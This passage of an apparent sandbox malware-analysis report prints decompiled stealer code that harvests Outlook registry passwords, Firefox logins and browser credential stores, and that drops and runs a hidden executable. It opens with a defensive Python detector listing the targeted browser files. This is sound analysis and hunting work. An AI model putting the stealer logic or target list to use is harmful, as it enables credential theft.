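The E0040BC0D calls in E0040B917 above are the sample's browser credential-store target list. Each call pairs a Chromium profile's Login Data database with the browser's Local State file, because since Chrome 80 the password blobs in Login Data are AES-256-GCM encrypted under a key that is stored DPAPI-wrapped in Local State (os_crypt.encrypted_key), so a stealer has to read both. The Python below is an added hunting example, not code from the Joe Sandbox report or from the sample: it transcribes the path pairs from the decompiled function, widens the hard-coded Default profile to any Chromium profile directory (Profile 1, Profile 2, ...), and flags non-browser processes that open them, rating a process that reads both halves of one store within a short window as high severity. The event format (dicts with time, pid, image and path, as a Sysmon-style file-access feed would give), the allowlist of browser executables and the sample events are assumptions constructed for the example.

```python
# Added hunting example for the credential-store target list in E0040B917. Not code from the
# report or the sample: event format, browser allowlist and sample events are assumptions.
import ntpath
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Transcribed from the E0040BC0D calls in the decompiled function:
# (browser, id passed as the call's last argument, Login Data path, Local State path)
CREDENTIAL_STORES = [
    ("Google Chrome", 0x01, r"\Google\Chrome\User Data\Default\Login Data", r"\Google\Chrome\User Data\Local State"),
    ("Epic Privacy Browser", 0x06, r"\Epic Privacy Browser\User Data\Default\Login Data", r"\Epic Privacy Browser\User Data\Local State"),
    ("Microsoft Edge", 0x07, r"\Microsoft\Edge\User Data\Default\Login Data", r"\Microsoft\Edge\User Data\Local State"),
    ("UC Browser", 0x08, r"\UCBrowser\User Data_i18n\Default\UC Login Data.17", r"\UCBrowser\User Data_i18n\Local State"),
    ("QQBrowser", 0x09, r"\Tencent\QQBrowser\User Data\Default\Login Data", r"\Tencent\QQBrowser\User Data\Local State"),
    ("Opera", 0x0a, r"\Opera Software\Opera Stable\Login Data", r"\Opera Software\Opera Stable\Local State"),
    ("Blisk", 0x0b, r"\Blisk\User Data\Default\Login Data", r"\Blisk\User Data\Local State"),
    ("Chromium", 0x0c, r"\Chromium\User Data\Default\Login Data", r"\Chromium\User Data\Local State"),
    ("Brave", 0x0d, r"\BraveSoftware\Brave-Browser\User Data\Default\Login Data", r"\BraveSoftware\Brave-Browser\User Data\Local State"),
    ("Vivaldi", 0x0e, r"\Vivaldi\User Data\Default\Login Data", r"\Vivaldi\User Data\Local State"),
    ("Comodo Dragon", 0x0f, r"\Comodo\Dragon\User Data\Default\Login Data", r"\Comodo\Dragon\User Data\Local State"),
    ("Torch", 0x10, r"\Torch\User Data\Default\Login Data", r"\Torch\User Data\Local State"),
    ("Slimjet", 0x11, r"\Slimjet\User Data\Default\Login Data", r"\Slimjet\User Data\Local State"),
    ("CentBrowser", 0x12, r"\CentBrowser\User Data\Default\Login Data", r"\CentBrowser\User Data\Local State"),
]

# Assumed legitimate owners of these files (not taken from the report).
ASSUMED_BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "opera.exe", "brave.exe", "vivaldi.exe", "chromium.exe"}


def _suffix_regex(rel_path):
    """Match rel_path at the end of a full path, case-insensitively. The sample only reads
    the 'Default' profile; widen that segment to any Chromium profile directory."""
    parts = rel_path.split("\\Default\\")
    body = r"\\(?:Default|Profile \d+)\\".join(re.escape(p) for p in parts)
    return re.compile(body + r"$", re.IGNORECASE)


_MATCHERS = [(name, sid, _suffix_regex(login), _suffix_regex(state))
             for name, sid, login, state in CREDENTIAL_STORES]


def classify_path(path):
    """Return (browser, sample_id, 'login_data' | 'local_state'), or None for other files."""
    for name, sid, login_re, state_re in _MATCHERS:
        if login_re.search(path):
            return name, sid, "login_data"
        if state_re.search(path):
            return name, sid, "local_state"
    return None


def find_credential_store_access(events, allowed_images=ASSUMED_BROWSER_IMAGES,
                                 window=timedelta(seconds=60)):
    """One finding per (pid, image, browser). 'high' when one process read both the Login Data
    database and the Local State file within `window` (the pair a post-Chrome-80 stealer needs,
    since the AES-GCM key for the password blobs sits DPAPI-wrapped in Local State);
    a single-file read is reported as 'medium'."""
    first_seen = defaultdict(dict)      # (pid, image, browser) -> {kind: first timestamp}
    sample_ids = {}
    for ev in events:
        hit = classify_path(ev["path"])
        if hit is None:
            continue
        browser, sid, kind = hit
        image = ntpath.basename(ev["image"]).lower()
        if image in allowed_images:
            continue
        key = (ev["pid"], image, browser)
        sample_ids[key] = sid
        first_seen[key].setdefault(kind, datetime.fromisoformat(ev["time"]))
    findings = []
    for key, kinds in first_seen.items():
        paired = ("login_data" in kinds and "local_state" in kinds
                  and abs(kinds["login_data"] - kinds["local_state"]) <= window)
        findings.append({"pid": key[0], "image": key[1], "browser": key[2],
                         "sample_id": sample_ids[key], "files": sorted(kinds),
                         "severity": "high" if paired else "medium"})
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["pid"], f["browser"]))


# Constructed sample telemetry (Sysmon-style file reads); not from the report.
_BUILD = r"C:\Users\alice\AppData\Local\Temp\build.exe"
SAMPLE_EVENTS = [
    {"time": "2021-07-20T10:00:00", "pid": 1180, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"time": "2021-07-20T10:05:01", "pid": 4321, "image": _BUILD,
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State"},
    {"time": "2021-07-20T10:05:02", "pid": 4321, "image": _BUILD,
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Profile 1\Login Data"},
    {"time": "2021-07-20T10:05:03", "pid": 4321, "image": _BUILD,
     "path": r"C:\Users\alice\AppData\Roaming\Opera Software\Opera Stable\Login Data"},
    {"time": "2021-07-20T10:05:04", "pid": 4321, "image": _BUILD,
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"},
]

if __name__ == "__main__":
    for finding in find_credential_store_access(SAMPLE_EVENTS):
        print(finding)
```

The allowlist is deliberately small and by image name only; in production it should be keyed on signed image path, otherwise a dropped binary named chrome.exe is waved through. The paths are matched as suffixes so that both the %LOCALAPPDATA% stores (Chrome, Edge, Brave, ...) and the %APPDATA% ones (Opera) are caught without hard-coding the profile root.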

                                  C-Code - Quality: 83%
                                  			E00408D0F(void* __ecx, void* __eflags, void* _a4) {
                                  				short _v544;
                                  				char _v696;
                                  				short _v704;
                                  				char _v724;
                                  				struct tagMSG _v748;
                                  				struct _WNDCLASSW _v788;
                                  				struct _SYSTEMTIME _v804;
                                  				char _v808;
                                  				void* _v812;
                                  				long _v816;
                                  				intOrPtr _t46;
                                  				intOrPtr _t49;
                                  				intOrPtr _t52;
                                  				intOrPtr _t54;
                                  				intOrPtr _t57;
                                  				intOrPtr _t60;
                                  				intOrPtr _t65;
                                  				struct HWND__* _t69;
                                  				int _t73;
                                  				intOrPtr _t94;
                                  				void* _t95;
                                  				intOrPtr _t99;
                                  				void* _t107;
                                  				void* _t110;
                                  				struct HINSTANCE__* _t111;
                                  				struct HWND__* _t112;
                                  				void* _t114;
                                  				signed int _t119;
                                  				intOrPtr _t122;
                                  				intOrPtr _t125;
                                  				intOrPtr _t129;
                                  				intOrPtr _t131;
                                  				void* _t132;
                                  				void* _t133;
                                  				void* _t140;
                                  				signed int _t143;
                                  				signed int _t144;
                                  				signed int _t146;
                                  				void* _t150;
                                  
                                  				_t114 = __ecx;
                                  				_t111 = GetModuleHandleA(0);
                                  				_v788.hIcon = 0;
                                  				_v804.wSecond = 0;
                                  				asm("xorps xmm0, xmm0");
                                  				asm("stosd");
                                  				asm("movlpd [esp+0x30], xmm0");
                                  				asm("movlpd [esp+0x3c], xmm0");
                                  				asm("stosd");
                                  				asm("movlpd [esp+0x44], xmm0");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				_t46 =  *0x42675c; // 0x0
                                  				E00401052(_t46 + 0x210, 0, 0x800);
                                  				_t49 =  *0x42675c; // 0x0
                                  				E00401052(_t49 + 0x10, 0, 0x208);
                                  				_t52 =  *0x42675c; // 0x0
                                  				_t150 = (_t146 & 0xfffffff8) - 0x314 + 0x18;
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t52 + 0x10, _t133, _t140, _t110); // 0x1c = CSIDL_LOCAL_APPDATA
				_t54 =  *0x42675c; // 0x0
				lstrcatW(_t54 + 0x10, L"\\Microsoft Vision\\"); // working directory: %LOCALAPPDATA%\Microsoft Vision\
				_t57 =  *0x42675c; // 0x0
				CreateDirectoryW(_t57 + 0x10, 0);
                                  				_t60 =  *0x42675c; // 0x0
                                  				_t153 =  *((intOrPtr*)(_t60 + 0xa14));
                                  				if( *((intOrPtr*)(_t60 + 0xa14)) != 0) {
                                  					E00401052( &_v544, 0, 0x208);
                                  					_t99 =  *0x42675c; // 0x0
                                  					_t150 = _t150 + 0xc;
                                  					lstrcpyW( &_v544, _t99 + 0x10);
                                  					lstrcatW( &_v544, "*");
                                  					E004036F7(_t150,  &_v544);
                                  					_t107 = E00411446( &_v724, _t153, _t114);
                                  					_t129 =  *0x42675c; // 0x0
                                  					E00401FB7(_t129 + 0xa18, _t153, _t107);
                                  					_t131 = _v748.pt;
                                  					_t154 = _t131;
                                  					if(_t131 != 0) {
                                  						E00401B27(_t131, _t131);
                                  					}
                                  				}
                                  				_t132 = 4;
                                  				_t143 = E004035B9( &_v808, _t132, _t154);
                                  				E00403447(E0040357C( &_v812, _t132, _t154, L"ExplorerIdentifier"), _t154, _t143);
                                  				E00405FEB(_v816);
                                  				_t65 =  *0x42675c; // 0x0
                                  				_v816 = 0;
                                  				if( *((intOrPtr*)(_t65 + 0xa14)) != 0) {
					GetLocalTime( &_v804);
					// Log name is day-month-year_hour.minute.second; %02d is a minimum width, so the four-digit wYear is printed in full.
					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
					_t122 =  *0x42675c; // 0x0
					_t150 = _t150 + 0x20;
					_t26 = _t122 + 0x10; // 0x10
					E0040357C(E0040357C(_t122 + 0xc, _t132, _t122 + 0xc, _t26), _t132, _t122 + 0xc,  &_v696);
					_t94 =  *0x42675c; // 0x0
					_t95 = CreateFileW( *(_t94 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0); // GENERIC_ALL, FILE_SHARE_READ, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
					_t125 =  *0x42675c; // 0x0
					 *(_t125 + 4) = _t95;
					CloseHandle(_t95);
                                  				}
                                  				_v788.lpszClassName = _v812;
                                  				_v788.lpfnWndProc = E00408793;
                                  				_v788.hInstance = _t111;
                                  				RegisterClassW( &_v788);
				_t69 = CreateWindowExW(0, _v788.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _t111, _a4); // hWndParent 0xfffffffd = HWND_MESSAGE: message-only window, never shown
                                  				_t119 = 7;
                                  				_t112 = _t69;
                                  				memset( &_v748, 0, _t119 << 2);
                                  				_t73 = GetMessageA( &_v748, _t112, 0, 0);
                                  				if(_t73 == 0) {
                                  					L9:
                                  					_t144 = _v748.wParam;
                                  					goto L10;
                                  				} else {
                                  					_t144 = _t143 | 0xffffffff;
                                  					while(_t73 != _t144) {
                                  						TranslateMessage( &_v748);
                                  						DispatchMessageA( &_v748);
                                  						_t73 = GetMessageA( &_v748, _t112, 0, 0);
                                  						if(_t73 != 0) {
                                  							continue;
                                  						}
                                  						goto L9;
                                  					}
                                  					L10:
                                  					E00405FEB(_v812);
                                  					return _t144;
                                  				}
                                  			}
                                  Instruction addresses (report address column): 0x00408d0f .. 0x00408faf

                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00408D21
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00408D90
                                  • lstrcatW.KERNEL32 ref: 00408DAA
                                  • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 00408DB6
                                  • lstrcpyW.KERNEL32(?,-00000010), ref: 00408DF0
                                  • lstrcatW.KERNEL32 ref: 00408E03
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00411446: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00411473
                                  • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 00408E86
                                  • wsprintfW.USER32 ref: 00408EBD
                                  • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00408EFF
                                  • CloseHandle.KERNEL32(00000000), ref: 00408F0F
                                  • RegisterClassW.USER32 ref: 00408F2E
                                  • CreateWindowExW.USER32 ref: 00408F46
                                  • GetMessageA.USER32 ref: 00408F67
                                  • TranslateMessage.USER32 ref: 00408F79
                                  • DispatchMessageA.USER32 ref: 00408F84
                                  • GetMessageA.USER32 ref: 00408F94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                  • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                  • API String ID: 2678186124-2372768292
                                  • Opcode ID: 4e13b100e2b3fe66040d78225b473c357b4793047b4bceb166c70d05fad76bb2
                                  • Instruction ID: 5c496a3f65fd177ded775e206ced170c84e42a303c2806b3eceb831f6cf01448
                                  • Opcode Fuzzy Hash: 4e13b100e2b3fe66040d78225b473c357b4793047b4bceb166c70d05fad76bb2
                                  • Instruction Fuzzy Hash: 51718172604304ABC320DBA5DC45EABB7FCEB89704F00492EF685E3291DB39D945CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E004099FF(void* __ecx, void* __edx, void* __eflags, void* _a4) {
                                  				int _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v292;
                                  				char _v556;
                                  				char _v820;
                                  				char _v9012;
                                  				char _v17204;
                                  				long _t124;
                                  				long _t130;
                                  				long _t136;
                                  				long _t142;
                                  				void* _t180;
                                  				void* _t181;
                                  				void* _t199;
                                  				void* _t207;
                                  				void* _t208;
                                  				void* _t209;
                                  				void* _t210;
                                  				void* _t211;
                                  				void* _t212;
                                  				void* _t213;
                                  				void* _t214;
                                  				void* _t215;
                                  				void* _t216;
                                  				void* _t217;
                                  
                                  				_t199 = __edx;
                                  				_t181 = __ecx;
                                  				E004011C0(0x4334, __ecx);
                                  				_v8 = 0x1000;
                                  				_v24 = 0;
                                  				_v20 = 0;
                                  				_t180 = _t181;
                                  				_v16 = 0;
                                  				E00401052( &_v292, 0, 0x104);
                                  				E00401052( &_v556, 0, 0x104);
                                  				E00401052( &_v820, 0, 0x104);
                                  				E00401052( &_v9012, 0, _v8);
                                  				_t207 = _a4;
                                  				_t209 = _t208 + 0x30;
                                  				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
                                  					E00403411( &_v20, _t199,  &_v9012);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t210 = _t209 + 0xc;
                                  				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
                                  					E00403411( &_v20, _t199,  &_v9012);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t211 = _t210 + 0xc;
                                  				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
                                  					E00403411( &_v24, _t199,  &_v9012);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t212 = _t211 + 0xc;
                                  				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
                                  					E00403411( &_v20, _t199,  &_v9012);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t213 = _t212 + 0xc;
                                  				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
                                  					E00403411( &_v24, _t199,  &_v9012);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t214 = _t213 + 0xc;
                                  				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
                                  				_t225 = _t124;
                                  				if(_t124 == 0) {
                                  					E00401052( &_v17204, _t124, 0x1000);
                                  					E00409D97( &_v9012,  &_v17204, _t225, _v8);
                                  					_t214 = _t214 + 0x10;
                                  					E00403411( &_v16,  &_v17204,  &_v17204);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t215 = _t214 + 0xc;
                                  				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
                                  				_t226 = _t130;
                                  				if(_t130 == 0) {
                                  					E00401052( &_v17204, _t130, 0x1000);
                                  					E00409D97( &_v9012,  &_v17204, _t226, _v8);
                                  					_t215 = _t215 + 0x10;
                                  					E00403411( &_v16,  &_v17204,  &_v17204);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t216 = _t215 + 0xc;
                                  				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
                                  				_t227 = _t136;
                                  				if(_t136 == 0) {
                                  					E00401052( &_v17204, _t136, 0x1000);
                                  					E00409D97( &_v9012,  &_v17204, _t227, _v8);
                                  					_t216 = _t216 + 0x10;
                                  					E00403411( &_v16,  &_v17204,  &_v17204);
                                  				}
                                  				_v8 = 0x1000;
                                  				E00401052( &_v9012, 0, 0x1000);
                                  				_t217 = _t216 + 0xc;
                                  				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
                                  				_t228 = _t142;
                                  				if(_t142 == 0) {
                                  					E00401052( &_v17204, _t142, 0x1000);
                                  					E00409D97( &_v9012,  &_v17204, _t228, _v8);
                                  					_t217 = _t217 + 0x10;
                                  					E00403411( &_v16,  &_v17204,  &_v17204);
                                  				}
                                  				_v12 = 3;
                                  				if(E00403373( &_v24) > 0) {
                                  					E00401FF2(_t217 - 0x10,  &_v24);
                                  					E00402028(_t180);
                                  				}
                                  				E00401441( &_v24);
                                  				return 1;
                                  			}

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,74A345DD,767130EA,00000000,?,004099C3), ref: 00409A81
                                  • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,74A345DD,767130EA), ref: 00409AC8
                                  • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 00409B0C
                                  • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00409B50
                                  • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 00409B94
                                  • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 00409BD8
                                  • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00409C45
                                  • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 00409CB2
                                  • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 00409D1F
                                    • Part of subcall function 00409D97: GlobalAlloc.KERNEL32(00000040,-00000001,74A345FD,?,?,?,00409D4B,00001000,?,00000000,00001000), ref: 00409DB5
                                    • Part of subcall function 00409D97: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409D4B), ref: 00409DEB
                                    • Part of subcall function 00409D97: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00409E22
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                  • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                  • API String ID: 6593746-2537589853
                                  • Opcode ID: cc5f769d671623cbfaa9f0c516c5158cd819fe66edd51a48f4d1e9d80896eb4f
                                  • Instruction ID: 7120254dbc2b6b4f3800d12c0dea7aeb6369d048fca86938223c4741ea706cc6
                                  • Opcode Fuzzy Hash: cc5f769d671623cbfaa9f0c516c5158cd819fe66edd51a48f4d1e9d80896eb4f
                                  • Instruction Fuzzy Hash: FFA11EB291011DAADB25EB91CD45FEF737CAF54744F1000BAF605F61C1EA78AB448BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E00415169(void* __ecx, void* __eflags, long _a4) {
                                  				intOrPtr* _v8;
                                  				long _v12;
                                  				struct _SHELLEXECUTEINFOA _v72;
                                  				char _v1096;
                                  				char _v2120;
                                  				char _v3144;
                                  				void* _t38;
                                  				void* _t40;
                                  				void* _t83;
                                  
                                  				_t75 =  *_a4;
                                  				_t68 = __ecx + 4;
                                  				_v8 = __ecx + 4;
                                  				E00403549(_t68, E00413441( *_a4 + 4,  *_t75));
                                  				E00405FEB(_a4);
                                  				_t38 = LoadResource(0, _a4);
                                  				_a4 = SizeofResource(0, _a4);
                                  				_t40 = LockResource(_t38);
                                  				E00401052( &_v1096, 0, 0x400);
                                  				E00401052( &_v2120, 0, 0x400);
                                  				GetTempPathA(0x400,  &_v1096);
                                  				lstrcatA( &_v1096, "find.exe");
                                  				GetTempPathA(0x400,  &_v2120);
                                  				lstrcatA( &_v2120, "find.db");
                                  				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
                                  				WriteFile(_t83, _t40, _a4,  &_v12, 0);
                                  				CloseHandle(_t83);
                                  				E00401052( &_v3144, 0, 0x400);
                                  				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
                                  				_v72.cbSize = 0x3c;
                                  				_v72.lpFile =  &_v1096;
                                  				_v72.fMask = 0x40;
                                  				asm("xorps xmm0, xmm0");
                                  				_v72.lpParameters =  &_v3144;
                                  				asm("movlpd [ebp-0x20], xmm0");
                                  				asm("movlpd [ebp-0x18], xmm0");
                                  				asm("movlpd [ebp-0x10], xmm0");
                                  				_v72.hwnd = 0;
                                  				_v72.lpVerb = 0;
                                  				_v72.lpDirectory = 0;
                                  				_v72.nShow = 0;
                                  				_v72.hInstApp = 0;
                                  				return ShellExecuteExA( &_v72);
                                  			}

                                  APIs
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • LoadResource.KERNEL32(00000000,?,00000000), ref: 004151A4
                                  • SizeofResource.KERNEL32(00000000,?), ref: 004151B0
                                  • LockResource.KERNEL32(00000000), ref: 004151BA
                                  • GetTempPathA.KERNEL32(00000400,?), ref: 004151F4
                                  • lstrcatA.KERNEL32(?,find.exe), ref: 00415208
                                  • GetTempPathA.KERNEL32(00000400,?), ref: 00415216
                                  • lstrcatA.KERNEL32(?,find.db), ref: 00415224
                                  • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 0041523F
                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00415251
                                  • CloseHandle.KERNEL32(00000000), ref: 00415258
                                  • wsprintfA.USER32 ref: 00415288
                                  • ShellExecuteExA.SHELL32(0000003C), ref: 004152D6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                  • String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
                                  • API String ID: 2504251837-265381321
                                  • Opcode ID: c968e0a10a2c1637be2f7f2b00f5e3c21a02e84e25c142268a7a615d38930b4a
                                  • Instruction ID: a64ecab57c3cf55662885f0afd46cea5e91dac6a4cbb1ef5118ba8298ebcf816
                                  • Opcode Fuzzy Hash: c968e0a10a2c1637be2f7f2b00f5e3c21a02e84e25c142268a7a615d38930b4a
                                  • Instruction Fuzzy Hash: C7411FB190021DABDB10DFA5DD85EDEBBBCFF89304F108166F609A2150DB749A858FA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E0040A36F(intOrPtr __ecx, void* __eflags, char _a4) {
                                  				int _v12;
                                  				int _v16;
                                  				WCHAR* _v20;
                                  				WCHAR* _v24;
                                  				char _v28;
                                  				intOrPtr _v32;
                                  				WCHAR* _v36;
                                  				char _v40;
                                  				char _v44;
                                  				int _v48;
                                  				int _v52;
                                  				int _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v68;
                                  				char _v72;
                                  				char _v76;
                                  				char _v80;
                                  				char _v84;
                                  				char _v88;
                                  				long _v92;
                                  				int _v96;
                                  				intOrPtr _v100;
                                  				char _v104;
                                  				char _v108;
                                  				char _v112;
                                  				void* _v116;
                                  				int _v120;
                                  				char _v124;
                                  				char _v128;
                                  				char _v132;
                                  				char _v136;
                                  				char _v140;
                                  				char _v144;
                                  				char _v148;
                                  				char _v152;
                                  				int _v156;
                                  				char _v160;
                                  				intOrPtr _v164;
                                  				char _v180;
                                  				char _v184;
                                  				short _v704;
                                  				short _v1224;
                                  				char* _t165;
                                  				void* _t167;
                                  				int _t189;
                                  				int _t190;
                                  				int _t193;
                                  				int _t207;
                                  				WCHAR* _t215;
                                  				void* _t217;
                                  				int _t221;
                                  				void* _t230;
                                  				void* _t236;
                                  				void* _t242;
                                  				int _t281;
                                  				int _t283;
                                  				char* _t293;
                                  				char* _t325;
                                  				void* _t386;
                                  				long _t389;
                                  				intOrPtr _t391;
                                  				intOrPtr _t392;
                                  				WCHAR* _t393;
                                  				int _t394;
                                  				void* _t395;
                                  				void* _t396;
                                  				void* _t397;
                                  
                                  				_t397 = __eflags;
                                  				_t392 = __ecx;
                                  				_v32 = __ecx;
                                  				E004036F7( &_v24, L"Profile");
                                  				_t281 = 0;
                                  				E00401052( &_v1224, 0, 0x208);
                                  				_t396 = _t395 + 0xc;
                                  				_v92 = 0;
                                  				_t389 = 0;
                                  				E00401052( &_v704, 0, 0x104);
                                  				_t385 =  &_v704;
                                  				if(E0040B87D(L"firefox.exe",  &_v704, _t397) != 0) {
                                  					_t293 =  &_v44;
                                  					E004036F7(_t293,  &_v704);
                                  					lstrcatW( &_v704, L"\\firefox.exe");
                                  					GetBinaryTypeW( &_v704,  &_v92);
                                  					_t399 = _v92 - 6;
                                  					_t165 =  &_v44;
                                  					if(_v92 != 6) {
                                  						_push(0);
                                  					} else {
                                  						_push(1);
                                  					}
                                  					_push(_t293);
                                  					E0040373F(_t396, _t165);
                                  					_t167 = E0040B165(_t392, _t385, _t399);
                                  					_t400 = _t167;
                                  					if(_t167 != 0) {
                                  						E0040357C( &_a4, _t385, _t400, L"\\Mozilla\\Firefox\\");
                                  						E0040373F( &_v36,  &_a4);
                                  						E0040357C( &_v36, _t385, _t400, L"profiles.ini");
                                  						E00403549( &_v24, E004036F7( &_v40, L"Profile"));
                                  						E00405FEB(_v40);
                                  						E00403384( &_v24, _t385, _t400, _t281);
                                  						while(GetPrivateProfileStringW(_v24, L"Path", _t281,  &_v1224, 0x104, _v36) != 0) {
                                  							_t389 = _t389 + 1;
                                  							_v40 = _t389;
                                  							E00403549( &_v24, E004036F7( &_v96, L"Profile"));
                                  							E00405FEB(_v96);
                                  							_v96 = _t281;
                                  							E00403384( &_v24, _t385, __eflags, _t389);
                                  							E0040373F( &_v12,  &_a4);
                                  							E0040357C( &_v12, _t385, __eflags,  &_v1224);
                                  							E00403666( &_v12,  &_v28);
                                  							_t189 =  *((intOrPtr*)(_t392 + 0x68))(_v28);
                                  							__eflags = _t189;
                                  							if(_t189 == 0) {
                                  								_t190 =  *((intOrPtr*)(_t392 + 0x80))();
                                  								_v156 = _t190;
                                  								__eflags = _t190;
                                  								if(_t190 == 0) {
                                  									goto L7;
                                  								} else {
                                  									_t193 =  *((intOrPtr*)(_t392 + 0x7c))(_t190, 1, _t281);
                                  									_t396 = _t396 + 0xc;
                                  									__eflags = _t193;
                                  									if(_t193 != 0) {
                                  										goto L7;
                                  									} else {
                                  										E0040373F( &_v20,  &_v12);
                                  										E0040357C( &_v20, _t385, __eflags, L"\\logins.json");
                                  										_t386 = 0x1a;
                                  										E00410C8A( &_v16, _t386, __eflags);
                                  										E0040357C( &_v16, _t386, __eflags, "\\");
                                  										_t385 = 8;
                                  										E00403447( &_v16, __eflags, E004035B9( &_v56, _t385, __eflags));
                                  										E00405FEB(_v56);
